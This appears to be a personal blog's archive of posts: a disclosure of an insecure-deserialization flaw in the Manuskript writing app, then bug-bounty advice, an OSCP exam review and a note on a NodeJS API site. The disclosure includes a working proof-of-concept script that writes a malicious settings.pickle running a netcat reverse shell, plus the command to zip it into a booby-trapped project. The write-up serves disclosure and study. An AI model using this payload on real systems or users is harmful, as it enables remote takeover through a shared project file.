Category Archives: coding

Arbitrary Code Execution in Manuskript < 0.12

Edit: A pull request has been submitted to remove this functionality and to depricate the old pickled settings, which is a wise security decision.

Edit: This vulnerability has been assigned CVE-2021-35196. It’s currently listed as disputed, even though it is definitely a vulnerability.

I was searching for an alternative to Scrivener to write my future nobel prize winning novel and ran across Manuskript. It looked promising. I found out that it was open-source and on github – which is always cool.

I decided to clone it and take a look at it. It’s written in Python, so that is good for me. It’s probably the language I’m most comfortable in these days.

I started checking out the code and I immediately noticed that pickle was imported in settings.py. The first thing that should come to mind to any security researcher worth their salt is insecure deserialization via the pickle.loads() and pickle.load() functions.

Sure enough, in settings.py, I noticed on lines 190 and 191, it looks like the program’s settings are loaded via pickle.loads() and pickle.load(), respectively. Now, I just had to figure out how to get to that point in the code.

It turns out that this wasn’t overly tough and it would simply involve loading a project that contains a malicious settings.pickle file. In loadSave.py, the function loadProject() on line 30 is responsible for doing exactly what you think it is supposed to do. You will notice in this function that it checks to see if the project is a zip file, but the project does not have to be a zip file.

I used a zip file in my exploit because that would probably be what is used in a realistic exploitation scenario. e.g. I send a malicious project to a co-writer, editor, publisher, etc. or I post a sample project of some sort online for others to use.

After the function determines if the project is a zip file or not, it checks the version of the project. This is where you need to do a small amount of work to exploit the insecure deserialization. It turns out that Manuskript has two versions of settings, version 0 and version 1. Version 0 is the one that uses the pickle module to deserialize the settings.

In order to force the program into the insecure deserialization, we just have to have a zip file without a MANUSKRIPT text file or a VERSION text file in the project and the project number will default to 0, which is what we want.

Now, onto the exploit. There are many references to insecure deserialization online, so google them if you aren’t familiar, but here is the code I used on Ubuntu 20.04 to generate a reverse shell to localhost port 1234. This payload can easily be modified to do anything you want it to do on Linux, Mac, and/or Windows. When this code is ran, it outputs a malicious settings.pickle file, which we will include in the project.

#!/usr/bin/env python3

import pickle
import os


class EvilPickle(object):
    def __reduce__(self):
       	cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
        return os.system, (cmd,)


pickle_data = pickle.dumps(EvilPickle())
with open("settings.pickle", "wb") as file:
    file.write(pickle_data)

After the settings.pickle file is output, simply zip it up:

zip malicious-project.zip settings.pickle

And now you have a malicious-project.zip file that you simply load into Manuskript.

I notified the people involved and they don’t have intentions to fix this issue. They are currently refactoring the project and the deserialization code may be removed altogether.

So you wanna bug hunt?

> All the Rage:

Bug hunting seems to be all the rage these days. I can understand that, hacking is fun. So if you can hack (legally) and get paid, why not? Let me just tell you what you’re getting yourself into.

For one, you probably aren’t going to make much money, and even if you do make some money, you’d have probably made more with a part time job, or doing whatever needs to get done at your day job to move up in the organization and make more money.

Here are a few questions to ask yourself before you bug hunt.

Can you afford $20-$40 a month for a VPS? You’ll be doing A LOT of recon and you don’t want to do it from your home IP address. You’ll get IP bans, and it will really make your household angry if they can’t get on Netflix because you spent all night hammering Akamai or whatever the case may be.

Can you afford a $400 Burp Pro subscription? Yeah, you may be able to get away without it, but IMO it isn’t worth the effort – double so if you do/are planning to work in the security industry.

> Programs:

Now, you see all those programs listed for hacking on HackerOne and and BugCrowd? Well they are all public programs that have had thousands of people picking over their programs for YEARS at this point. That’s not to say some bugs aren’t still there, they are, but they are way, way less in numbers. Not to mention, many of them have had paid pentesters hacking on them. A lot of these programs were private before they went public too, so when you see the “launched” time, it actually isn’t true – the program didn’t just launch this month.

And don’t get me started on the unpaid bounty programs. They basically are getting all this work done without having to pay anybody. But hey, you’ll get points for hacking them!!!!! Oh wow, great. Unpaid programs should not exist. It lessens the value of our work.

Let me tell you a story of me and an unpaid program. About a year ago, I got invited to this program, and I immediately realized the scope was very large – which is awesome. Within a few days, I had found a bunch of bugs. All of these bugs were medium or higher, and one was EXTREMELY critical. So naturally, I’m happy, and I’m thinking I’m going to make some good money. Wrong. That’s when I found out that this program was unpaid.

I know, I know – it is my fault for not checking first. At the time, I was under the assumption that you had to be a paid program to be a private program. I don’t know where I got that from. My point remains valid. Basically, there is a good chance I saved this company millions of dollars, and without going into details, it could have been worse that just a monetary loss for them. You know what I got in return? Points. Great. Wow.

This actually happened to me again recently. Yes, I’m stupid. But I digress, haha.

> Coding:

I see a lot of posts asking if you need to know how to code to bug hunt. It sounds like a lot of these people are trying to get away without learning how to code. Let me help you.

YOU NEED TO KNOW HOW TO CODE.

You don’t have to be a pro, but you need to be decently fluent in python and bash, and at the very least, be able to read PHP and Javascript. The more experienced you are the better.

You see those people making a lot of money bug hunting? They are probably good coders. They’ve probably automated all their recon with Python or Bash scripts. They can decompile mobile and web apps. They’re pretty good coders, generally.

> Certs:

Let’s talk about the OSCP. Is it a cool cert? Yes. Does it teach you much about bug hunting? Yes and no. You’ll need to add a lot more techniques and tools to your arsenal to be successful. The offsec AWAE does have some topics that are useful to bug hunting – web apps in particular.

Let’s talk about these techniques and tools.

You’ll need to install a lot of tools you’ve never heard of. And listen, everybody has a massive amount of bug hunting scripted. They are constantly scanning ALL the hosts in EVERY program for low hanging fruit. Again, that doesn’t mean you won’t find anything, but it greatly reduces your chances.

You still wanna bug hunt? Go for it. But don’t get discouraged when you’re in the hole $600 bucks and you’ve found two self XSS vulns after a year. Lol

> TLDR:

Don’t bug hunt, and if you do, avoid unpaid programs. Better yet, spend your time advancing your career or getting a part time job. Also, use my Linode link for your VPS 😉

OSCP Exam Review

offsec — watch out for that mysterious hacker standing in the doorway!

I took the OSCP (Offensive Security Certified Professional) some time ago, but recently enough. If you’re reading this, you probably know of the exam, but for those that don’t, here is a short explanation.

Basically, it’s a cybersecurity exam where you’re given access to a computer network containing five machines (computers). In the first 24 hours of the exam, your goal is to break into (or root, as we say) as many of these machines as possible. The second 24 hours is reserved for writing a report detailing the results of your penetration test. It’s supposed to mimic, in some fashion, a “real life” penetration test.

The test has a reputation of being really hard. It’s commonplace for people to not sleep much in the 48 hours they’re allotted to hack and write. And, after all, it isn’t an exam where you can just read a book, or memorize multiple choice questions – you actually have to know how to hack. Offensive Security, the company that runs the program, actually watches you the whole time via webcam.

With that said, I feel that the difficulty of the exam is overstated. That isn’t because I’m some sort of IT professional that has been doing this for 10 years professionally. I don’t work in IT, software engineering, or anything even tangentially related to computers. Nor do I have a degree in IT or Computer Science. I think people have issues with the exam for one main reason.

I think many people come into it it way unprepared. And this may seem obvious, since if they were prepared, they would have passed, but please stick with me. They signed up for the OSCP, rooted a dozen boxes in the lab that you’re given access to, did a bit of the exercises in the manual, and called it a day, thinking they knew what they were doing because they’ve been working in IT for a decade. Well, let me tell you, they can always throw some software or web app at you that you’ve never even seen before, which is what happens to me weekly on HTB. However, the methods of attack will all be the same. In fact, I’d say the exam boxes were EASIER than easy boxes on HTB – especially the newer easy boxes.

In my opinion, you need root >90% of the lab machines, and then be active on HTB for a few months to be fully prepared for this exam. You need to make box enumeration and privilege escalation second nature. You need to have notes, too. They can be very helpful. You need to be able to rip out a custom buffer overflow exploit in python in less than an hour. You need to LEARN HOW TO GOOGLE. If you do this you’ll be golden.

I went in expecting Cyber World War 3, and was laughing and confused after about 5 hours when I had enough points to pass.

And then, once you pass, you can start in on something harder – the Advanced Web Attacks and Exploitation course to get the Offensive Security Web Expert certification also created by Offensive Security. That one is a 48 hours online exam followed by 24 hours to write a report, and supposedly much harder.

Good luck!

nuke-api.com

nuke-api.com is a site I made to work on my NodeJS skills. I had barely used Node before, so I figured I’d get some practice. I’m going to take the Offensive Security AWAE exam in a few months, so I wanted to refresh some of my web experience, after spending the last couple of years focused mostly on networking/networking security.

Anyway, the goal was to make a more easily digestible API consisting of data posted on the NRC website, specifically commercial nuclear power plant status. Currently, the endpoints are limited, but I will be added to the site as days go on. The site was built with the following tech stack:

Microsoft Azure Ubuntu VM
Mongo, Express, NodeJS, HTML, JS, CSS
Git, VSCode/Webstorm, Let’s Encrypt
Python (to scrape data from NRC website)

If you have any questions, feel free to ask.